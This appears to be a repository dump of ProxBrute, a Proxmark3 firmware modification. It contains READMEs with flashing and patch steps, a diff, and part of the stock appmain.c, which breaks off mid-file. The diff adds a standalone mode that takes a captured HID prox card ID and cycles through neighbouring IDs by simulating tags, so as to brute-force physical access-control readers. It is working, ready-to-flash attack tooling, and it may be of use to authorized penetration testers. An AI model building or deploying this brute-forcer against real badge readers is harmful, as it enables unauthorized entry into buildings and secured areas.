├── Updated Firmware and CDC Bootloader ├── README.MD ├── bootrom.elf ├── fullimage.elf └── patch │ ├── README.MD │ ├── brute.patch │ └── files from diff │ ├── orig │ ├── armsrc │ │ ├── Makefile │ │ ├── appmain.c │ │ ├── apps.h │ │ └── lfops.c │ └── common │ │ └── Makefile.common │ └── patch │ ├── armsrc │ ├── Makefile │ ├── appmain.c │ ├── apps.h │ └── lfops.c │ └── common │ └── Makefile.common ├── proxbrute-bundle-r517.tar.bz2 ├── proxbrute-bundle-v0.3.tar.gz ├── proxbrute-r517.patch ├── proxbrute-v0.3.patch └── readme /Updated Firmware and CDC Bootloader/README.MD: -------------------------------------------------------------------------------- 1 | This is the proxbrute mod by Brad Antoniewicz of Foundstone(https://github.com/brad-anton/proxbrute)
2 | ported to the latest Firmware with the CDC bootloader by Corey Harding of www.legacysecuritygroup.com
3 |
4 | Firmware Dated 9-23-2016
5 | proxmark3 source from Commit: 99911e5c7b8f4a2ca870046031e3f362324c0d88
6 |
7 | Flash the bootloader and fullimage elf files.
8 |
9 | A patch is also included in case you want to compile the source yourself.
10 |
11 | Instructions for using this port of the proxbrute mode on the elechouse RDV2 and standard version of the proxmark3 can be found at:
12 | https://legacysecuritygroup.com/index.php/categories/9-rfid/7-proxmark-3-emulating-hid-tags-in-standalone-mode -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/bootrom.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/brad-anton/proxbrute/34e5b07aaf40fe6a053b87d0f22ca02e7fc854a7/Updated Firmware and CDC Bootloader/bootrom.elf -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/fullimage.elf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/brad-anton/proxbrute/34e5b07aaf40fe6a053b87d0f22ca02e7fc854a7/Updated Firmware and CDC Bootloader/fullimage.elf -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/README.MD: -------------------------------------------------------------------------------- 1 | This is the proxbrute mod by Brad Antoniewicz of Foundstone(https://github.com/brad-anton/proxbrute)
2 | ported to the latest Firmware with the CDC bootloader by Corey Harding of www.legacysecuritygroup.com
3 |
4 | Firmware Dated 9-23-2016
5 | proxmark3 source from Commit: 99911e5c7b8f4a2ca870046031e3f362324c0d88
6 |
7 | Instructions for patching the files so you can the compile firmware yourself:
8 |
9 | Get the proxmark3 source from Commit: 99911e5c7b8f4a2ca870046031e3f362324c0d88
10 | copy brute.patch to proxmark3 directory
11 | cd into proxmark3 directory
12 | patch -p2 < ./brute.patch
13 |
14 | Then follow general compiling instructions from https://github.com/Proxmark/proxmark3/wiki/compiling
15 |
16 | Instructions for using this port of the proxbrute mode on the elechouse RDV2 and standard version of the proxmark3 can be found at:
17 | https://legacysecuritygroup.com/index.php/categories/9-rfid/7-proxmark-3-emulating-hid-tags-in-standalone-mode -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/brute.patch: -------------------------------------------------------------------------------- 1 | diff -Naur ./orig/armsrc/appmain.c ./patch/armsrc/appmain.c 2 | --- ./orig/armsrc/appmain.c 2016-09-23 07:04:07.000000000 -0400 3 | +++ ./patch/armsrc/appmain.c 2016-09-22 18:49:16.000000000 -0400 4 | @@ -655,7 +655,9 @@ 5 | int selected = 0; 6 | int playing = 0; 7 | int cardRead = 0; 8 | - 9 | + // ProxBrute Stuff: 10 | + unsigned int i; 11 | + unsigned int ZERO=0x00000000; 12 | // Turn on selected LED 13 | LED(selected + 1, 0); 14 | 15 | @@ -700,37 +702,6 @@ 16 | 17 | } 18 | 19 | - else if (button_pressed > 0 && cardRead == 1) 20 | - { 21 | - LEDsoff(); 22 | - LED(selected + 1, 0); 23 | - LED(LED_ORANGE, 0); 24 | - 25 | - // record 26 | - Dbprintf("Cloning %x %x%08x", selected, high[selected], low[selected]); 27 | - 28 | - // wait for button to be released 29 | - while(BUTTON_PRESS()) 30 | - WDT_HIT(); 31 | - 32 | - /* need this delay to prevent catching some weird data */ 33 | - SpinDelay(500); 34 | - 35 | - CopyHIDtoT55x7(0, high[selected], low[selected], 0); 36 | - Dbprintf("Cloned %x %x%08x", selected, high[selected], low[selected]); 37 | - 38 | - LEDsoff(); 39 | - LED(selected + 1, 0); 40 | - // Finished recording 41 | - 42 | - // If we were previously playing, set playing off 43 | - // so next button push begins playing what we recorded 44 | - playing = 0; 45 | - 46 | - cardRead = 0; 47 | - 48 | - } 49 | - 50 | // Change where to record (or begin playing) 51 | else if (button_pressed) 52 | { 53 | @@ -750,9 +721,47 @@ 54 | // wait for button to be released 55 | while(BUTTON_PRESS()) 56 | WDT_HIT(); 57 | - Dbprintf("%x %x%08x", selected, high[selected], low[selected]); 58 | - CmdHIDsimTAG(high[selected], low[selected], 0); 59 | - DbpString("Done playing"); 60 | +/* START PROXBRUTE */ 61 | + 62 | +/* 63 | + ProxBrute - brad a. - foundstone 64 | + 65 | + Following code is a trivial brute forcer once you read a valid tag 66 | + the idea is you get a valid tag, then just try and brute force to 67 | + another priv level. The problem is that it has no idea if the code 68 | + worked or not, so its a crap shoot. One option is to time how long 69 | + it takes to get a valid ID then start from scratch every time. 70 | +*/ 71 | + 72 | + if ( selected == 1 ) { 73 | + DbpString("Entering ProxBrute Mode"); 74 | + DbpString("brad a. - foundstone"); 75 | + Dbprintf("Current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]); 76 | + LED(LED_ORANGE,0); 77 | + LED(LED_RED,0); 78 | + for (i=low[selected]-1;i>ZERO;i--) { 79 | + if(BUTTON_PRESS()) { 80 | + DbpString("Told to Stop"); 81 | + break; 82 | + } 83 | + 84 | + Dbprintf("Trying Facility = %08x ID %08x", high[selected], i); 85 | + CmdHIDsimTAGProxBrute(high[selected], i, 0); 86 | + SpinDelay(500); 87 | + } 88 | + 89 | + } else { 90 | + DbpString("Red is lit, not entering ProxBrute Mode"); 91 | + Dbprintf("%x %x %x", selected, high[selected], low[selected]); 92 | + CmdHIDsimTAG(high[selected], low[selected], 0); 93 | + DbpString("Done playing"); 94 | + } 95 | + 96 | + 97 | + 98 | + 99 | +/* END PROXBRUTE */ 100 | + 101 | if (BUTTON_HELD(1000) > 0) 102 | { 103 | DbpString("Exiting"); 104 | diff -Naur ./orig/armsrc/apps.h ./patch/armsrc/apps.h 105 | --- ./orig/armsrc/apps.h 2016-09-23 07:04:07.000000000 -0400 106 | +++ ./patch/armsrc/apps.h 2016-09-22 18:49:16.000000000 -0400 107 | @@ -66,6 +66,10 @@ 108 | void AcquireTiType(void); 109 | void AcquireRawBitsTI(void); 110 | void SimulateTagLowFrequency(int period, int gap, int ledcontrol); 111 | +// ProxBrute - created this function so that i didnt mess with anything 112 | +// important - needed to only send a couple tags then goto next 113 | +void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol); 114 | +void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol); 115 | void SimulateTagLowFrequencyBidir(int divisor, int max_bitlen); 116 | void CmdHIDsimTAG(int hi, int lo, int ledcontrol); 117 | void CmdFSKsimTAG(uint16_t arg1, uint16_t arg2, size_t size, uint8_t *BitStream); 118 | diff -Naur ./orig/armsrc/lfops.c ./patch/armsrc/lfops.c 119 | --- ./orig/armsrc/lfops.c 2016-09-23 07:04:07.000000000 -0400 120 | +++ ./patch/armsrc/lfops.c 2016-09-22 18:49:16.000000000 -0400 121 | @@ -439,6 +439,70 @@ 122 | } 123 | } 124 | 125 | + 126 | +// ProxBrute - created this function so that i didnt mess with anything 127 | +// important - needed to only send a set number of tags 128 | +void SimulateTagLowFrequencyProxBrute(int period, int gap, int ledcontrol) 129 | +{ 130 | + int i; 131 | + int x=0; 132 | + uint8_t *tab = BigBuf_get_addr(); 133 | + 134 | + FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 135 | + FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_EDGE_DETECT); 136 | + 137 | + AT91C_BASE_PIOA->PIO_PER = GPIO_SSC_DOUT | GPIO_SSC_CLK; 138 | + 139 | + AT91C_BASE_PIOA->PIO_OER = GPIO_SSC_DOUT; 140 | + AT91C_BASE_PIOA->PIO_ODR = GPIO_SSC_CLK; 141 | + 142 | +#define SHORT_COIL() LOW(GPIO_SSC_DOUT) 143 | +#define OPEN_COIL() HIGH(GPIO_SSC_DOUT) 144 | + 145 | + i = 0; 146 | + x = 0; 147 | + for(;;) { 148 | + while(!(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK)) { 149 | + 150 | + if(BUTTON_PRESS() || x == 20000 ) { 151 | + DbpString("Stopped"); 152 | + return; 153 | + } 154 | + WDT_HIT(); 155 | + } 156 | + 157 | + if (ledcontrol) 158 | + LED_D_ON(); 159 | + 160 | + if(tab[i]) 161 | + OPEN_COIL(); 162 | + else 163 | + SHORT_COIL(); 164 | + 165 | + if (ledcontrol) 166 | + LED_D_OFF(); 167 | + 168 | + while(AT91C_BASE_PIOA->PIO_PDSR & GPIO_SSC_CLK) { 169 | + if(BUTTON_PRESS() || x == 20000 ) { 170 | + DbpString("Stopped"); 171 | + return; 172 | + } 173 | + WDT_HIT(); 174 | + } 175 | + x++; 176 | + i++; 177 | + if(i == period) { 178 | + i = 0; 179 | + if (gap) { 180 | + SHORT_COIL(); 181 | + SpinDelayUs(gap); 182 | + } 183 | + } 184 | + } 185 | +} 186 | + 187 | + 188 | + 189 | #define DEBUG_FRAME_CONTENTS 1 190 | void SimulateTagLowFrequencyBidir(int divisor, int t0) 191 | { 192 | @@ -758,6 +822,64 @@ 193 | if (ledcontrol) LED_A_OFF(); 194 | } 195 | 196 | + 197 | +// ProxBrute - I know this is rediculous to do this 198 | +void CmdHIDsimTAGProxBrute(int hi, int lo, int ledcontrol) 199 | +{ 200 | + int n=0, i=0; 201 | + /* 202 | + HID tag bitstream format 203 | + The tag contains a 44bit unique code. This is sent out MSB first in sets of 4 bits 204 | + A 1 bit is represented as 6 fc8 and 5 fc10 patterns 205 | + A 0 bit is represented as 5 fc10 and 6 fc8 patterns 206 | + A fc8 is inserted before every 4 bits 207 | + A special start of frame pattern is used consisting a0b0 where a and b are neither 0 208 | + nor 1 bits, they are special patterns (a = set of 12 fc8 and b = set of 10 fc10) 209 | + */ 210 | + 211 | + if (hi>0xFFF) { 212 | + DbpString("Tags can only have 44 bits."); 213 | + return; 214 | + } 215 | + fc(0,&n); 216 | + // special start of frame marker containing invalid bit sequences 217 | + fc(8, &n); fc(8, &n); // invalid 218 | + fc(8, &n); fc(10, &n); // logical 0 219 | + fc(10, &n); fc(10, &n); // invalid 220 | + fc(8, &n); fc(10, &n); // logical 0 221 | + 222 | + WDT_HIT(); 223 | + // manchester encode bits 43 to 32 224 | + for (i=11; i>=0; i--) { 225 | + if ((i%4)==3) fc(0,&n); 226 | + if ((hi>>i)&1) { 227 | + fc(10, &n); fc(8, &n); // low-high transition 228 | + } else { 229 | + fc(8, &n); fc(10, &n); // high-low transition 230 | + } 231 | + } 232 | + 233 | + WDT_HIT(); 234 | + // manchester encode bits 31 to 0 235 | + for (i=31; i>=0; i--) { 236 | + if ((i%4)==3) fc(0,&n); 237 | + if ((lo>>i)&1) { 238 | + fc(10, &n); fc(8, &n); // low-high transition 239 | + } else { 240 | + fc(8, &n); fc(10, &n); // high-low transition 241 | + } 242 | + } 243 | + 244 | + if (ledcontrol) 245 | + LED_A_ON(); 246 | + SimulateTagLowFrequencyProxBrute(n, 0, ledcontrol); 247 | + 248 | + if (ledcontrol) 249 | + LED_A_OFF(); 250 | +} 251 | + 252 | + 253 | + 254 | // loop to get raw HID waveform then FSK demodulate the TAG ID from it 255 | void CmdHIDdemodFSK(int findone, int *high, int *low, int ledcontrol) 256 | { 257 | diff -Naur ./orig/armsrc/Makefile ./patch/armsrc/Makefile 258 | --- ./orig/armsrc/Makefile 2016-09-23 07:04:07.000000000 -0400 259 | +++ ./patch/armsrc/Makefile 2016-09-22 18:49:16.000000000 -0400 260 | @@ -10,7 +10,7 @@ 261 | 262 | #remove one of the following defines and comment out the relevant line 263 | #in the next section to remove that particular feature from compilation 264 | -APP_CFLAGS = -DWITH_ISO14443a_StandAlone -DWITH_LF -DWITH_ISO15693 -DWITH_ISO14443a -DWITH_ISO14443b -DWITH_ICLASS -DWITH_LEGICRF -DWITH_HITAG -DWITH_CRC -DON_DEVICE -DWITH_HFSNOOP \ 265 | +APP_CFLAGS = -DWITH_LF -DWITH_ISO15693 -DWITH_ISO14443a -DWITH_ISO14443b -DWITH_ICLASS -DWITH_LEGICRF -DWITH_HITAG -DWITH_CRC -DON_DEVICE -DWITH_HFSNOOP \ 266 | -fno-strict-aliasing -ffunction-sections -fdata-sections 267 | #-DWITH_LCD 268 | 269 | diff -Naur ./orig/common/Makefile.common ./patch/common/Makefile.common 270 | --- ./orig/common/Makefile.common 2016-09-23 07:04:07.000000000 -0400 271 | +++ ./patch/common/Makefile.common 2016-09-22 18:49:16.000000000 -0400 272 | @@ -67,7 +67,7 @@ 273 | 274 | INCLUDES = ../include/proxmark3.h ../include/at91sam7s512.h ../include/config_gpio.h ../include/usb_cmd.h $(APP_INCLUDES) 275 | 276 | -CFLAGS = -c $(INCLUDE) -Wall -Werror -pedantic -std=c99 -Os $(APP_CFLAGS) 277 | +CFLAGS = -c $(INCLUDE) -Wall -pedantic -std=c99 -Os $(APP_CFLAGS) 278 | LDFLAGS = -nostartfiles -nodefaultlibs -Wl,-gc-sections -n 279 | 280 | LIBS = -lgcc 281 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/orig/armsrc/Makefile: -------------------------------------------------------------------------------- 1 | #----------------------------------------------------------------------------- 2 | # This code is licensed to you under the terms of the GNU GPL, version 2 or, 3 | # at your option, any later version. See the LICENSE.txt file for the text of 4 | # the license. 5 | #----------------------------------------------------------------------------- 6 | # Makefile for armsrc, see ../common/Makefile.common for common settings 7 | #----------------------------------------------------------------------------- 8 | 9 | APP_INCLUDES = apps.h 10 | 11 | #remove one of the following defines and comment out the relevant line 12 | #in the next section to remove that particular feature from compilation 13 | APP_CFLAGS = -DWITH_LF -DWITH_ISO15693 -DWITH_ISO14443a -DWITH_ISO14443b -DWITH_ICLASS -DWITH_LEGICRF -DWITH_HITAG -DWITH_CRC -DON_DEVICE -DWITH_HFSNOOP \ 14 | -fno-strict-aliasing -ffunction-sections -fdata-sections 15 | #-DWITH_LCD 16 | 17 | #SRC_LCD = fonts.c LCD.c 18 | SRC_LF = lfops.c hitag2.c hitagS.c lfsampling.c pcf7931.c lfdemod.c protocols.c 19 | SRC_ISO15693 = iso15693.c iso15693tools.c 20 | SRC_ISO14443a = epa.c iso14443a.c mifareutil.c mifarecmd.c mifaresniff.c 21 | SRC_ISO14443b = iso14443b.c 22 | SRC_CRAPTO1 = crapto1.c crypto1.c des.c aes.c 23 | SRC_CRC = iso14443crc.c crc.c crc16.c crc32.c 24 | 25 | #the FPGA bitstream files. Note: order matters! 26 | FPGA_BITSTREAMS = fpga_lf.bit fpga_hf.bit 27 | 28 | #the zlib source files required for decompressing the fpga config at run time 29 | SRC_ZLIB = inflate.c inffast.c inftrees.c adler32.c zutil.c 30 | #additional defines required to compile zlib 31 | ZLIB_CFLAGS = -DZ_SOLO -DZ_PREFIX -DNO_GZIP -DZLIB_PM3_TUNED 32 | APP_CFLAGS += $(ZLIB_CFLAGS) 33 | # zlib includes: 34 | APP_CFLAGS += -I../zlib 35 | 36 | # stdint.h provided locally until GCC 4.5 becomes C99 compliant 37 | APP_CFLAGS += -I. 38 | 39 | # Compile these in thumb mode (small size) 40 | THUMBSRC = start.c \ 41 | $(SRC_LCD) \ 42 | $(SRC_ISO15693) \ 43 | $(SRC_LF) \ 44 | $(SRC_ZLIB) \ 45 | appmain.c \ 46 | printf.c \ 47 | util.c \ 48 | string.c \ 49 | usb_cdc.c \ 50 | cmd.c 51 | 52 | # These are to be compiled in ARM mode 53 | ARMSRC = fpgaloader.c \ 54 | legicrf.c \ 55 | $(SRC_ISO14443a) \ 56 | $(SRC_ISO14443b) \ 57 | $(SRC_CRAPTO1) \ 58 | $(SRC_CRC) \ 59 | legic_prng.c \ 60 | iclass.c \ 61 | BigBuf.c \ 62 | optimized_cipher.c \ 63 | hfsnoop.c 64 | 65 | # Do not move this inclusion before the definition of {THUMB,ASM,ARM}SRC 66 | include ../common/Makefile.common 67 | 68 | OBJS = $(OBJDIR)/fullimage.s19 69 | FPGA_COMPRESSOR = ../client/fpga_compress 70 | 71 | all: $(OBJS) 72 | 73 | .DELETE_ON_ERROR: 74 | 75 | $(OBJDIR)/fpga_all.o: $(OBJDIR)/fpga_all.bit.z 76 | $(OBJCOPY) -O elf32-littlearm -I binary -B arm --prefix-sections=fpga_all_bit $^ $@ 77 | 78 | $(OBJDIR)/fpga_all.bit.z: $(FPGA_BITSTREAMS) $(FPGA_COMPRESSOR) 79 | $(FPGA_COMPRESSOR) $(filter %.bit,$^) $@ 80 | 81 | $(FPGA_COMPRESSOR): 82 | make -C ../client $(notdir $(FPGA_COMPRESSOR)) 83 | 84 | $(OBJDIR)/fullimage.stage1.elf: $(VERSIONOBJ) $(OBJDIR)/fpga_all.o $(THUMBOBJ) $(ARMOBJ) 85 | $(CC) $(LDFLAGS) -Wl,-T,ldscript,-Map,$(patsubst %.elf,%.map,$@) -o $@ $^ $(LIBS) 86 | 87 | $(OBJDIR)/fullimage.nodata.bin: $(OBJDIR)/fullimage.stage1.elf 88 | $(OBJCOPY) -O binary -I elf32-littlearm --remove-section .data $^ $@ 89 | 90 | $(OBJDIR)/fullimage.nodata.o: $(OBJDIR)/fullimage.nodata.bin 91 | $(OBJCOPY) -O elf32-littlearm -I binary -B arm --rename-section .data=stage1_image $^ $@ 92 | 93 | $(OBJDIR)/fullimage.data.bin: $(OBJDIR)/fullimage.stage1.elf 94 | $(OBJCOPY) -O binary -I elf32-littlearm --only-section .data $^ $@ 95 | 96 | $(OBJDIR)/fullimage.data.bin.z: $(OBJDIR)/fullimage.data.bin $(FPGA_COMPRESSOR) 97 | $(FPGA_COMPRESSOR) $(filter %.bin,$^) $@ 98 | 99 | $(OBJDIR)/fullimage.data.o: $(OBJDIR)/fullimage.data.bin.z 100 | $(OBJCOPY) -O elf32-littlearm -I binary -B arm --rename-section .data=compressed_data $^ $@ 101 | 102 | $(OBJDIR)/fullimage.elf: $(OBJDIR)/fullimage.nodata.o $(OBJDIR)/fullimage.data.o 103 | $(CC) $(LDFLAGS) -Wl,-T,ldscript,-Map,$(patsubst %.elf,%.map,$@) -o $@ $^ 104 | 105 | tarbin: $(OBJS) 106 | $(TAR) $(TARFLAGS) ../proxmark3-$(platform)-bin.tar $(OBJS:%=armsrc/%) $(OBJS:%.s19=armsrc/%.elf) 107 | 108 | clean: 109 | $(DELETE) $(OBJDIR)$(PATHSEP)*.o 110 | $(DELETE) $(OBJDIR)$(PATHSEP)*.elf 111 | $(DELETE) $(OBJDIR)$(PATHSEP)*.s19 112 | $(DELETE) $(OBJDIR)$(PATHSEP)*.map 113 | $(DELETE) $(OBJDIR)$(PATHSEP)*.d 114 | $(DELETE) $(OBJDIR)$(PATHSEP)*.z 115 | $(DELETE) $(OBJDIR)$(PATHSEP)*.bin 116 | $(DELETE) version.c 117 | 118 | .PHONY: all clean help 119 | help: 120 | @echo Multi-OS Makefile, you are running on $(DETECTED_OS) 121 | @echo Possible targets: 122 | @echo + all - Build the full image $(OBJDIR)/fullimage.s19 123 | @echo + clean - Clean $(OBJDIR) 124 | 125 | -------------------------------------------------------------------------------- /Updated Firmware and CDC Bootloader/patch/files from diff/orig/armsrc/appmain.c: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Jonathan Westhues, Mar 2006 3 | // Edits by Gerhard de Koning Gans, Sep 2007 (##) 4 | // 5 | // This code is licensed to you under the terms of the GNU GPL, version 2 or, 6 | // at your option, any later version. See the LICENSE.txt file for the text of 7 | // the license. 8 | //----------------------------------------------------------------------------- 9 | // The main application code. This is the first thing called after start.c 10 | // executes. 11 | //----------------------------------------------------------------------------- 12 | 13 | #include "usb_cdc.h" 14 | #include "cmd.h" 15 | 16 | #include "proxmark3.h" 17 | #include "apps.h" 18 | #include "util.h" 19 | #include "printf.h" 20 | #include "string.h" 21 | 22 | #include 23 | 24 | #include "legicrf.h" 25 | #include 26 | #include 27 | #include "lfsampling.h" 28 | #include "BigBuf.h" 29 | #include "mifareutil.h" 30 | #include "pcf7931.h" 31 | #ifdef WITH_LCD 32 | #include "LCD.h" 33 | #endif 34 | 35 | // Craig Young - 14a stand-alone code 36 | #ifdef WITH_ISO14443a_StandAlone 37 | #include "iso14443a.h" 38 | #endif 39 | 40 | //============================================================================= 41 | // A buffer where we can queue things up to be sent through the FPGA, for 42 | // any purpose (fake tag, as reader, whatever). We go MSB first, since that 43 | // is the order in which they go out on the wire. 44 | //============================================================================= 45 | 46 | #define TOSEND_BUFFER_SIZE (9*MAX_FRAME_SIZE + 1 + 1 + 2) // 8 data bits and 1 parity bit per payload byte, 1 correction bit, 1 SOC bit, 2 EOC bits 47 | uint8_t ToSend[TOSEND_BUFFER_SIZE]; 48 | int ToSendMax; 49 | static int ToSendBit; 50 | struct common_area common_area __attribute__((section(".commonarea"))); 51 | 52 | void ToSendReset(void) 53 | { 54 | ToSendMax = -1; 55 | ToSendBit = 8; 56 | } 57 | 58 | void ToSendStuffBit(int b) 59 | { 60 | if(ToSendBit >= 8) { 61 | ToSendMax++; 62 | ToSend[ToSendMax] = 0; 63 | ToSendBit = 0; 64 | } 65 | 66 | if(b) { 67 | ToSend[ToSendMax] |= (1 << (7 - ToSendBit)); 68 | } 69 | 70 | ToSendBit++; 71 | 72 | if(ToSendMax >= sizeof(ToSend)) { 73 | ToSendBit = 0; 74 | DbpString("ToSendStuffBit overflowed!"); 75 | } 76 | } 77 | 78 | //============================================================================= 79 | // Debug print functions, to go out over USB, to the usual PC-side client. 80 | //============================================================================= 81 | 82 | void DbpString(char *str) 83 | { 84 | byte_t len = strlen(str); 85 | cmd_send(CMD_DEBUG_PRINT_STRING,len,0,0,(byte_t*)str,len); 86 | } 87 | 88 | #if 0 89 | void DbpIntegers(int x1, int x2, int x3) 90 | { 91 | cmd_send(CMD_DEBUG_PRINT_INTEGERS,x1,x2,x3,0,0); 92 | } 93 | #endif 94 | 95 | void Dbprintf(const char *fmt, ...) { 96 | // should probably limit size here; oh well, let's just use a big buffer 97 | char output_string[128]; 98 | va_list ap; 99 | 100 | va_start(ap, fmt); 101 | kvsprintf(fmt, output_string, 10, ap); 102 | va_end(ap); 103 | 104 | DbpString(output_string); 105 | } 106 | 107 | // prints HEX & ASCII 108 | void Dbhexdump(int len, uint8_t *d, bool bAsci) { 109 | int l=0,i; 110 | char ascii[9]; 111 | 112 | while (len>0) { 113 | if (len>8) l=8; 114 | else l=len; 115 | 116 | memcpy(ascii,d,l); 117 | ascii[l]=0; 118 | 119 | // filter safe ascii 120 | for (i=0;i126) ascii[i]='.'; 122 | 123 | if (bAsci) { 124 | Dbprintf("%-8s %*D",ascii,l,d," "); 125 | } else { 126 | Dbprintf("%*D",l,d," "); 127 | } 128 | 129 | len-=8; 130 | d+=8; 131 | } 132 | } 133 | 134 | //----------------------------------------------------------------------------- 135 | // Read an ADC channel and block till it completes, then return the result 136 | // in ADC units (0 to 1023). Also a routine to average 32 samples and 137 | // return that. 138 | //----------------------------------------------------------------------------- 139 | static int ReadAdc(int ch) 140 | { 141 | uint32_t d; 142 | 143 | AT91C_BASE_ADC->ADC_CR = AT91C_ADC_SWRST; 144 | AT91C_BASE_ADC->ADC_MR = 145 | ADC_MODE_PRESCALE(63 /* was 32 */) | // ADC_CLK = MCK / ((63+1) * 2) = 48MHz / 128 = 375kHz 146 | ADC_MODE_STARTUP_TIME(1 /* was 16 */) | // Startup Time = (1+1) * 8 / ADC_CLK = 16 / 375kHz = 42,7us Note: must be > 20us 147 | ADC_MODE_SAMPLE_HOLD_TIME(15 /* was 8 */); // Sample & Hold Time SHTIM = 15 / ADC_CLK = 15 / 375kHz = 40us 148 | 149 | // Note: ADC_MODE_PRESCALE and ADC_MODE_SAMPLE_HOLD_TIME are set to the maximum allowed value. 150 | // Both AMPL_LO and AMPL_HI are very high impedance (10MOhm) outputs, the input capacitance of the ADC is 12pF (typical). This results in a time constant 151 | // of RC = 10MOhm * 12pF = 120us. Even after the maximum configurable sample&hold time of 40us the input capacitor will not be fully charged. 152 | // 153 | // The maths are: 154 | // If there is a voltage v_in at the input, the voltage v_cap at the capacitor (this is what we are measuring) will be 155 | // 156 | // v_cap = v_in * (1 - exp(-RC/SHTIM)) = v_in * (1 - exp(-3)) = v_in * 0,95 (i.e. an error of 5%) 157 | // 158 | // Note: with the "historic" values in the comments above, the error was 34% !!! 159 | 160 | AT91C_BASE_ADC->ADC_CHER = ADC_CHANNEL(ch); 161 | 162 | AT91C_BASE_ADC->ADC_CR = AT91C_ADC_START; 163 | 164 | while(!(AT91C_BASE_ADC->ADC_SR & ADC_END_OF_CONVERSION(ch))) 165 | ; 166 | d = AT91C_BASE_ADC->ADC_CDR[ch]; 167 | 168 | return d; 169 | } 170 | 171 | int AvgAdc(int ch) // was static - merlok 172 | { 173 | int i; 174 | int a = 0; 175 | 176 | for(i = 0; i < 32; i++) { 177 | a += ReadAdc(ch); 178 | } 179 | 180 | return (a + 15) >> 5; 181 | } 182 | 183 | void MeasureAntennaTuningLfOnly(int *vLf125, int *vLf134, int *peakf, int *peakv, uint8_t LF_Results[]) 184 | { 185 | int i, adcval = 0, peak = 0; 186 | 187 | /* 188 | * Sweeps the useful LF range of the proxmark from 189 | * 46.8kHz (divisor=255) to 600kHz (divisor=19) and 190 | * read the voltage in the antenna, the result left 191 | * in the buffer is a graph which should clearly show 192 | * the resonating frequency of your LF antenna 193 | * ( hopefully around 95 if it is tuned to 125kHz!) 194 | */ 195 | 196 | FpgaDownloadAndGo(FPGA_BITSTREAM_LF); 197 | FpgaWriteConfWord(FPGA_MAJOR_MODE_LF_ADC | FPGA_LF_ADC_READER_FIELD); 198 | for (i=255; i>=19; i--) { 199 | WDT_HIT(); 200 | FpgaSendCommand(FPGA_CMD_SET_DIVISOR, i); 201 | SpinDelay(20); 202 | adcval = ((MAX_ADC_LF_VOLTAGE * AvgAdc(ADC_CHAN_LF)) >> 10); 203 | if (i==95) *vLf125 = adcval; // voltage at 125Khz 204 | if (i==89) *vLf134 = adcval; // voltage at 134Khz 205 | 206 | LF_Results[i] = adcval>>8; // scale int to fit in byte for graphing purposes 207 | if(LF_Results[i] > peak) { 208 | *peakv = adcval; 209 | peak = LF_Results[i]; 210 | *peakf = i; 211 | //ptr = i; 212 | } 213 | } 214 | 215 | for (i=18; i >= 0; i--) LF_Results[i] = 0; 216 | 217 | return; 218 | } 219 | 220 | void MeasureAntennaTuningHfOnly(int *vHf) 221 | { 222 | // Let the FPGA drive the high-frequency antenna around 13.56 MHz. 223 | LED_A_ON(); 224 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 225 | FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_READER_RX_XCORR); 226 | SpinDelay(20); 227 | *vHf = (MAX_ADC_HF_VOLTAGE * AvgAdc(ADC_CHAN_HF)) >> 10; 228 | LED_A_OFF(); 229 | 230 | return; 231 | } 232 | 233 | void MeasureAntennaTuning(int mode) 234 | { 235 | uint8_t LF_Results[256] = {0}; 236 | int peakv = 0, peakf = 0; 237 | int vLf125 = 0, vLf134 = 0, vHf = 0; // in mV 238 | 239 | LED_B_ON(); 240 | 241 | if (((mode & FLAG_TUNE_ALL) == FLAG_TUNE_ALL) && (FpgaGetCurrent() == FPGA_BITSTREAM_HF)) { 242 | // Reverse "standard" order if HF already loaded, to avoid unnecessary swap. 243 | MeasureAntennaTuningHfOnly(&vHf); 244 | MeasureAntennaTuningLfOnly(&vLf125, &vLf134, &peakf, &peakv, LF_Results); 245 | } else { 246 | if (mode & FLAG_TUNE_LF) { 247 | MeasureAntennaTuningLfOnly(&vLf125, &vLf134, &peakf, &peakv, LF_Results); 248 | } 249 | if (mode & FLAG_TUNE_HF) { 250 | MeasureAntennaTuningHfOnly(&vHf); 251 | } 252 | } 253 | 254 | cmd_send(CMD_MEASURED_ANTENNA_TUNING, vLf125 | (vLf134<<16), vHf, peakf | (peakv<<16), LF_Results, 256); 255 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 256 | LED_B_OFF(); 257 | return; 258 | } 259 | 260 | void MeasureAntennaTuningHf(void) 261 | { 262 | int vHf = 0; // in mV 263 | 264 | DbpString("Measuring HF antenna, press button to exit"); 265 | 266 | // Let the FPGA drive the high-frequency antenna around 13.56 MHz. 267 | FpgaDownloadAndGo(FPGA_BITSTREAM_HF); 268 | FpgaWriteConfWord(FPGA_MAJOR_MODE_HF_READER_RX_XCORR); 269 | 270 | for (;;) { 271 | SpinDelay(20); 272 | vHf = (MAX_ADC_HF_VOLTAGE * AvgAdc(ADC_CHAN_HF)) >> 10; 273 | 274 | Dbprintf("%d mV",vHf); 275 | if (BUTTON_PRESS()) break; 276 | } 277 | DbpString("cancelled"); 278 | 279 | FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF); 280 | 281 | } 282 | 283 | 284 | void ReadMem(int addr) 285 | { 286 | const uint8_t *data = ((uint8_t *)addr); 287 | 288 | Dbprintf("%x: %02x %02x %02x %02x %02x %02x %02x %02x", 289 | addr, data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[7]); 290 | } 291 | 292 | /* osimage version information is linked in */ 293 | extern struct version_information version_information; 294 | /* bootrom version information is pointed to from _bootphase1_version_pointer */ 295 | extern char *_bootphase1_version_pointer, _flash_start, _flash_end, _bootrom_start, _bootrom_end, __data_src_start__; 296 | void 